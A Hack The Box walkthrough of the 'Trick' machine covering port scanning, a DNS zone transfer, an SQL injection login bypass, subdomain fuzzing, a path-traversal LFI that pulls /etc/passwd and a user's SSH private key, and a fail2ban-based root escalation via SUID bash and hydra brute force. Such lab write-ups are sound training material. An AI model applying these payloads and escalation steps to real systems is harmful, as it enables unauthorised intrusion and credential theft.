---
sidebar_label: 🪄 Trick
description: ''
last_update:
  date: 2022/07/20
  author: Raúl Sánchez
tags:
  - DNS
  - SQLi
  - Wfuzz
  - LFI
  - fail2ban
  - hydra
  - SUID
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Trick

![](trick1.png)

> An easy machine where we will use **LFI**, and we will abuse fail2ban to escalate privileges.

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## Setting-up the Environment

First of all, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the IP address and hostname of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which htb
htb: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.166
[?] Type the name of the box: Trick

[!] Hack The Box Machine
10.10.11.166 Trick.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.166              

[!] Working directory created
[!] Initial configuration completed
```

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 trick.htb
PING Trick.htb (10.10.11.166) 56(84) bytes of data.
64 bytes from Trick.htb (10.10.11.166): icmp_seq=1 ttl=63 time=46.2 ms

--- Trick.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 46.201/46.201/46.201/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py trick.htb

trick.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port \[0-65535].
* [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
* [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
* [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
* [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
* [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* {name}.htb : Target machine.
* [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
* allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn trick.htb -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 17:16 CEST
Initiating SYN Stealth Scan at 17:16
Scanning trick.htb (10.10.11.166) [65535 ports]
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 80/tcp on 10.10.11.166
Completed SYN Stealth Scan at 17:16, 20.51s elapsed (65535 total ports)
Nmap scan report for trick.htb (10.10.11.166)
Host is up, received user-set (0.22s latency).
Scanned at 2022-07-21 17:16:03 CEST for 20s
Not shown: 58344 closed tcp ports (reset), 7188 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
25/tcp open  smtp    syn-ack ttl 63
53/tcp open  domain  syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.64 seconds
           Raw packets sent: 100267 (4.412MB) | Rcvd: 63921 (2.557MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.166
    [*] Open ports:  22,25,53,80

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
* {name}.htb : Target machine.
* [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
* targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,25,53,80 trick.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 17:18 CEST
Nmap scan report for trick.htb (10.10.11.166)
Host is up (0.063s latency).
rDNS record for 10.10.11.166: Trick.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.48 seconds
```

As we see, there are open four ports, SSH, SMTP, DNS and HTTP.

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::

### 1.2 Web

First, we can grab some information about the web with [whatweb](https://www.kali.org/tools/whatweb/) tool.

```bash
❯ whatweb http://10.10.11.166
http://10.10.11.166 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.14.2], IP[10.10.11.166], Script, Title[Coming Soon - Start Bootstrap Theme], nginx[1.14.2]
```

But we won't find anything interesting in the browser.

![](trick2.png)

### 1.3 DNS

We can perform **DNS Zone Transfer** here. Upon successful zone transfer, it
may leak some internal DNS Zone records. We got two new virtual host namely,
`root.trick.htb` and `preprod-payroll.trick.htb`.

```dns-zone
❯ dig trick.htb axfr @10.10.11.166

; <<>> DiG 9.18.4-2-Debian <<>> trick.htb axfr @10.10.11.166
;; global options: +cmd
trick.htb.        604800    IN    SOA    trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.        604800    IN    NS    trick.htb.
trick.htb.        604800    IN    A    127.0.0.1
trick.htb.        604800    IN    AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME    trick.htb.
trick.htb.        604800    IN    SOA    trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 48 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Thu Jul 21 17:30:37 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
```

Add these two new records to the `/etc/hosts` file.

```python
[!] Hack The Box Machine
10.10.11.166 Trick.htb preprod-payroll.trick.htb root.trick.htb
```

We will find a new web, where we can login. Using the user `' OR 1=1 --` and the same password we will be able to bypass the login screen. 

![](trick3.png)

This application is vulnerable to **SQL Injection Attack**.

![](trick4.png)

After some enumeration after login, we find the **credentials** of the **Administrator** named `Enemigosss` and his password `SuperGucciRainbowCake`.

![](trick5.png)

Tried to use this credential as **SSH** credential but got a permission denied message. This error message confirmed that SSH is configured to use **Key-Based Authentication** rather than **Password-Based Authentication**.

```bash
❯ ssh Enemigosss@trick.htb
Enemigosss@trick.htb's password: 
Permission denied, please try again. 
```

### 1.4 Wfuzz

Now we will create a new dictionary starting with `preprod-` and apply brute force using [wfuzz](https://www.kali.org/tools/wfuzz/).

```bash
❯ sed 's/^/preprod-/' /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt > dictionary
❯ wfuzz -c -w ./dictionary -H "Host: FUZZ.trick.htb" -u 10.10.11.166 -t 100 --hl 83
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.166/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================

000000254:   200        178 L    631 W      9660 Ch     "preprod-marketing"                                                                                                         

Total time: 7.465615
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 668.2637
```

We will find another domain, so we will add it to the file `/etc/hosts`.

```python
[!] Hack The Box Machine
10.10.11.166 Trick.htb preprod-payroll.trick.htb root.trick.htb preprod-marketing.trick.htb
```

In this web page we will see that it has some sections and that it uses the **parameter** `page=`.

![](trick6.png)

## 2. Foothold

### 2.1 LFI

Using the **parameter** `page=` we will try to read the `/etc/passwd` file with [Local File Inclusion](https://book.hacktricks.xyz/pentesting-web/file-inclusion#basic-lfi-and-bypasses).

```properties
❯ curl "preprod-marketing.trick.htb/index.php?page=..././..././..././etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash
```

We see that the user **`michael`** exists, let's look for an **ssh** key.

```properties
❯ curl "preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
```

**Copy** the key and use it to connect to the `target`.

```bash
❯ nano id_rsa
❯ chmod 600 id_rsa
❯ ssh -i id_rsa michael@trick.htb
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
```

Let's grab the user's **flag**!

```bash
michael@trick:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
michael@trick:~$ cat user.txt
```

### 2.2 Privilege Escalation

Using the command `sudo -l` we find that user `michael` can run the command `/etc/init.d/fail2ban` restart as **root** or we can say `michael` can run the command  `sudo /etc/init.d/fail2ban restart`, it won’t ask for the **root** password.

```bash
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
```

:::info
[Fail2ban](https://www.digitalocean.com/community/tutorials/how-fail2ban-works-to-protect-services-on-a-linux-server) is an **IDPS** (Intrusion Detection & Prevention System) tool that detects brute-force attacks and blocks malicious IP addresses by using Linux `iptables`.
:::

First we have to find the configuration file.

```bash
michael@trick:~$ cd /etc/fail2ban/action.d/
michael@trick:/etc/fail2ban/action.d$ cat iptables-multiport.conf 
# <CONFIGURATION>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>

# Option:  actionunban
# Notes.:  command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>

[Init]
```

We cannot modify the file but we can delete it and create a new one so we will do the following to modify the **`actionban`** file.

```bash
michael@trick:~$ sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/chmod u+s \/bin\/bash/g" /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
michael@trick:~$ rm -f /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:~$ mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:~$ sudo /etc/init.d/fail2ban restart
Restarting fail2ban (via systemctl): fail2ban.service.
```

Meanwhile, in another terminal we will do a **brute force attack** with [hydra](https://www.kali.org/tools/hydra/) to force the ban.

```bash
❯ hydra 10.10.11.166 ssh -l root -P /usr/share/wordlists/rockyou.txt
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

[DATA] attacking ssh://10.10.11.166:22/
```

After a few minutes the `bash` becomes **SUID**.

```bash
michael@trick:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
```

We successfully got **root shell**. Let us capture **root flag**!

```bash
michael@trick:~$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
```

I hope you made it too, see you next timee! 🙃
